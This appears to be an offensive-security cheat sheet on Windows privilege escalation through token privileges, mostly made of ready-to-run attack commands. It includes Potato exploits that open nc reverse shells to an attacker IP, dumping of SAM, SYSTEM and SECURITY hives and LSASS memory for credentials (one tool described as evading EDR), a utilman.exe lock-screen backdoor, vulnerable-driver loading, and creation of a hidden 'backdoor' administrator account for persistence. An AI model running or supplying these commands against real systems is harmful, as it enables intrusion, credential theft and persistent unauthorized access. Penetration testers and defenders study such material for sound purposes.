PrivEsc - Tokens & Privileges

Windows privileges = a list of specific powers attached to your token. One enabled privilege is often instant SYSTEM. Always start here after Local Enum .

i. The privilege table #

whoami /priv

Disabled privileges still count, you just need to enable them first (most tools handle this automatically).

ii. SeImpersonate / SeAssignPrimaryToken (Potato attacks) #

The most common path. Service accounts (IIS, MSSQL, etc) have this by default. Pick the potato by the OS:

PrintSpoofer (preferred when it works):

C:\Windows\Temp\PrintSpoofer.exe -i -c cmd.exe
## Or reverse:
C:\Windows\Temp\PrintSpoofer.exe -c "C:\Windows\Temp\nc.exe 10.10.14.1 4444 -e cmd.exe"

GodPotato (works on the newest patched boxes):

C:\Windows\Temp\GodPotato.exe -cmd "cmd /c whoami"
C:\Windows\Temp\GodPotato.exe -cmd "C:\Windows\Temp\nc.exe 10.10.14.1 4444 -e cmd.exe"

JuicyPotato (legacy):

JuicyPotato.exe -t * -l 1337 -p C:\Windows\Temp\nc.exe -a "10.10.14.1 4444 -e cmd.exe" -c "{CLSID}"
## Find a working CLSID from https://ohpe.it/juicy-potato/CLSID/

RoguePotato (when JuicyPotato fails on 2019+):

## On attacker, run a relay on port 135:
socat tcp-listen:135,reuseaddr,fork tcp:10.10.11.50:9999
## On target:
RoguePotato.exe -r 10.10.14.1 -l 9999 -e "C:\Windows\Temp\nc.exe 10.10.14.1 4444 -e cmd.exe"

iii. SeBackupPrivilege #

Read any file, even when DACL denies it. Get to SAM and SYSTEM hives, dump them offline:

## Copy SAM + SYSTEM with reg save (needs Backup priv, not admin)
reg save HKLM\SAM C:\Windows\Temp\SAM
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM
reg save HKLM\SECURITY C:\Windows\Temp\SECURITY
## Download to attacker, then:
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

When reg save is blocked, use robocopy with backup mode:

robocopy /B C:\Windows\System32\config\ C:\Windows\Temp\ SAM SYSTEM SECURITY

Then pass the hash to Administrator, see Lateral Movement .

iv. SeRestorePrivilege #

Write any file. Two classic abuse paths:

Replace utilman.exe (the accessibility tool on the lock screen) with cmd, then trigger from lockscreen Win+U:

takeown /f C:\Windows\System32\utilman.exe
copy C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
## Lock the screen, press Win+U -> SYSTEM cmd

Or overwrite a service binary you can’t normally write to, then restart the service (need restart rights, common with SeServiceLogon or admin on a service).

v. SeDebugPrivilege #

Open any process, including LSASS. Pull all logged-in user creds:

## Native procdump (signed Microsoft binary, often allowed)
procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp
## Then on attacker:
impacket-pypykatz lsa minidump lsass.dmp

## Native task manager dump if procdump isn't there
## (Task Manager -> Details -> right click lsass -> Create dump file)

## Nanodump (designed to evade EDR)
nanodump.exe --write C:\Windows\Temp\lsass.dmp

Or attach with a debugger and run shellcode:

## Open a SYSTEM process and inject
## Frameworks: pyrasite (Python), PowerSploit Invoke-DllInjection

vi. SeTakeOwnershipPrivilege #

Take ownership of any object, then change DACL to allow yourself write access:

takeown /f C:\Windows\System32\config\SAM
icacls C:\Windows\System32\config\SAM /grant %USERNAME%:F
copy C:\Windows\System32\config\SAM C:\Windows\Temp\SAM

Combine with SeRestore to skip the icacls step (you have write right via the privilege).

vii. SeLoadDriverPrivilege #

Load a kernel driver. Use a known vulnerable signed driver to gain kernel exec:

## Capcom.sys is the classic (signed by Capcom, vulnerable, lets you exec ring0 code)
## Public PoC: https://github.com/TarlogicSecurity/EoPLoadDriver
EoPLoadDriver.exe System\CurrentControlSet\MyService C:\Windows\Temp\capcom.sys
## Then exploit via ExploitCapcom.exe to spawn SYSTEM

Most modern Win blocks unsigned drivers and revokes Capcom’s signature. Try only on older boxes.

viii. SeManageVolumePrivilege #

Modest privilege that leads to file access. Use SeManageVolumeExploit:

SeManageVolumeExploit.exe
## Grants you NTFS rights to C:\, then you can read/write anything

ix. SeCreateToken + SeTcb #

If you have these, you are effectively SYSTEM already. Create your own token with any SIDs:

## Rare, but if you have SeCreateToken, NoPac-style abuse
## Direct token creation -> impersonate -> SYSTEM

x. Quick whoami /priv -> action table #

When you see this, do this:

SeImpersonatePrivilege            Enabled   -> PrintSpoofer / GodPotato
SeAssignPrimaryTokenPrivilege     Enabled   -> PrintSpoofer / GodPotato
SeBackupPrivilege                 Enabled   -> reg save SAM,SYSTEM,SECURITY
SeRestorePrivilege                Enabled   -> overwrite utilman.exe
SeDebugPrivilege                  Enabled   -> dump lsass with procdump/nanodump
SeTakeOwnershipPrivilege          Enabled   -> takeown + icacls on SAM
SeLoadDriverPrivilege             Enabled   -> capcom driver (legacy only)
SeManageVolumePrivilege           Enabled   -> SeManageVolumeExploit
SeTcbPrivilege                    Enabled   -> already SYSTEM-equivalent

xi. Service account default privileges #

Many footholds land you as a service account. Default privilege sets:

If you landed via IIS/SQL/network service, jump straight to Potato.

xii. After SYSTEM, persist #

Drop a callback (see Defender & AMSI Evasion when written) or add a local admin:

net user backdoor 'Passw0rd!' /add
net localgroup Administrators backdoor /add

Document everything you did for Persistence & Cleanup .